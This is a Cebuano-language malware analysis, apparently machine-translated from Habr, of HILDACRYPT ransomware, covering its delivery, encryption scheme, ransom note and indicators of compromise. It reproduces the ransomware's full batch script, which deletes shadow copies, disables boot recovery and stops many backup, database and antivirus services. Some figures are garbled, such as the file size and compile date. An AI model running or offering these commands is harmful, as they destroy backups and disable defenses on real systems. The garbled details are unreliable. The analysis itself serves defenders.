Hello, Habr! Sa makausa pa, naghisgot kami bahin sa labing bag-ong bersyon sa malware gikan sa kategorya nga Ransomware. Ang HILDACRYPT usa ka bag-ong ransomware, usa ka miyembro sa pamilyang Hilda nga nadiskubre kaniadtong Agosto 2019, nga gingalan sa Netflix nga cartoon nga gigamit sa pag-apod-apod sa software. Karon nahibal-an namon ang mga teknikal nga bahin sa kini nga gi-update nga ransomware virus.
Sa una nga bersyon sa Hilda ransomware, usa ka link sa usa nga gi-post sa Youtube
Static nga Pagtuki
Ang ransomware anaa sa PE32 .NET file nga gisulat para sa MS Windows. Ang gidak-on niini 135 bytes. Ang nag-unang program code ug ang defender program code gisulat sa C#. Sumala sa compilation date ug time stamp, ang binary gihimo niadtong Septiyembre 168, 14.
Sumala sa Detect It Easy, ang ransomware gi-archive gamit ang Confuser ug ConfuserEx, apan kini nga mga obfuscator parehas sa una, ang ConfuserEx ra ang mipuli sa Confuser, mao nga parehas ang ilang mga pirma sa code.
Ang HILDACRYPT sa tinuud giputos sa ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor sa pag-atake
Lagmit, ang ransomware nadiskobrehan sa usa sa mga web programming site, nga nagtakuban isip usa ka lehitimong XAMPP nga programa.
Ang tibuuk nga kadena sa impeksyon makita sa
Pagkalibog
Ang mga string sa ransomware gitipigan sa naka-encrypt nga porma. Kung gilansad, gi-decrypt kini sa HILDACRYPT gamit ang Base64 ug AES-256-CBC.
Pag-instalar
Una sa tanan, ang ransomware nagmugna og usa ka folder sa %AppDataRoaming% diin ang GUID (Globally Unique Identifier) parameter random nga namugna. Pinaagi sa pagdugang og bat file niini nga lokasyon, ang ransomware virus naglansad niini gamit ang cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
Nagsugod kini sa pagpatuman sa usa ka batch script aron ma-disable ang mga feature o serbisyo sa sistema.
Ang script naglangkob sa usa ka taas nga lista sa mga mando nga makaguba sa mga kopya sa anino, pag-disable sa SQL server, backup ug mga solusyon sa antivirus.
Pananglitan, wala kini molampos sa pagpahunong sa mga serbisyo sa Acronis Backup. Dugang pa, giatake niini ang mga backup nga sistema ug mga solusyon sa antivirus gikan sa mosunod nga mga tigbaligya: Veeam, Sophos, Kaspersky, McAfee ug uban pa.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Sa higayon nga ang mga serbisyo ug mga proseso nga gihisgutan sa ibabaw ma-disabled, ang cryptolocker mangolekta og impormasyon mahitungod sa tanang mga proseso nga nagdagan gamit ang tasklist nga sugo aron masiguro nga ang tanan nga gikinahanglan nga mga serbisyo wala na.
listahan sa buluhaton v/fo csv
Kini nga sugo nagpakita sa usa ka detalyado nga lista sa mga proseso nga nagdagan, ang mga elemento niini gibulag sa "," timaan.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Pagkahuman niini nga pagsusi, ang ransomware magsugod sa proseso sa pag-encrypt.
Encryption
Pag-encrypt sa file
Ang HILDACRYPT moagi sa tanang makitang sulod sa mga hard drive, gawas sa Recycle.Bin ug Reference AssembliesMicrosoft folders. Ang ulahi adunay mga kritikal nga dll, pdb, ug uban pa nga mga file para sa .Net nga mga aplikasyon nga makaapekto sa operasyon sa ransomware. Sa pagpangita sa mga file nga ma-encrypt, ang mosunod nga listahan sa mga extension gigamit:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Gigamit sa ransomware ang AES-256-CBC algorithm aron ma-encrypt ang mga file sa gumagamit. Ang yawe nga gidak-on mao ang 256 bits ug ang initialization vector (IV) nga gidak-on mao ang 16 bytes.
Sa mosunod nga screenshot, ang mga kantidad sa byte_2 ug byte_1 nakuha nga random gamit ang GetBytes().
Key
SA UG
Ang naka-encrypt nga file adunay extension nga HCY!.. Kini usa ka pananglitan sa usa ka naka-encrypt nga file. Ang yawe ug IV nga gihisgutan sa ibabaw gimugna alang niini nga file.
Key encryption
Gitipigan sa cryptolocker ang nahimo nga yawe sa AES sa usa ka naka-encrypt nga file. Ang una nga bahin sa na-encrypt nga file adunay usa ka header nga adunay mga datos sama sa HILDACRYPT, KEY, IV, FileLen sa format nga XML, ug ingon niini:
Ang AES ug IV key encryption gihimo gamit ang RSA-2048, ug ang pag-encode gihimo gamit ang Base64. Ang RSA public key gitipigan sa lawas sa cryptolocker sa usa sa mga naka-encrypt nga mga string sa XML nga format.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Usa ka RSA public key ang gigamit sa pag-encrypt sa AES file key. Ang RSA public key kay Base64 nga naka-encode ug naglangkob sa modulus ug public exponent nga 65537. Ang decryption nagkinahanglan sa RSA private key, nga anaa sa tig-atake.
Human sa RSA encryption, ang AES key gi-encode gamit ang Base64 nga gitipigan sa encrypted file.
Mensahe sa lukat
Kung kompleto na ang pag-encrypt, isulat sa HILDACRYPT ang html file sa folder diin gi-encrypt ang mga file. Ang abiso sa ransomware adunay duha ka email address diin ang biktima mahimong makontak ang tig-atake.
Ang pahibalo sa pagpangilkil naglangkob usab sa linya nga "Walay loli nga luwas;)" - usa ka paghisgot sa mga karakter sa anime ug manga nga adunay dagway sa gagmay nga mga batang babaye nga gidili sa Japan.
konklusyon
Ang HILDACRYPT, usa ka bag-ong ransomware nga pamilya, nagpagawas ug bag-ong bersyon. Ang modelo sa pag-encrypt nagpugong sa biktima sa pag-decrypt sa mga file nga gi-encrypt sa ransomware. Ang Cryptolocker naggamit sa mga aktibong pamaagi sa pagpanalipod aron dili pag-disable ang mga serbisyo sa pagpanalipod nga may kalabutan sa mga backup nga sistema ug mga solusyon sa antivirus. Ang tagsulat sa HILDACRYPT usa ka fan sa animated series nga Hilda nga gipakita sa Netflix, ang link sa trailer nga anaa sa buyout letter alang sa miaging bersyon sa programa.
Sama sa naandan,
Mga timailhan sa pagkompromiso
Ekstensiyon sa file HCY!
HILDACRYPTReadMe.html
xamp.exe nga adunay usa ka letra nga "p" ug walay digital nga pirma
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com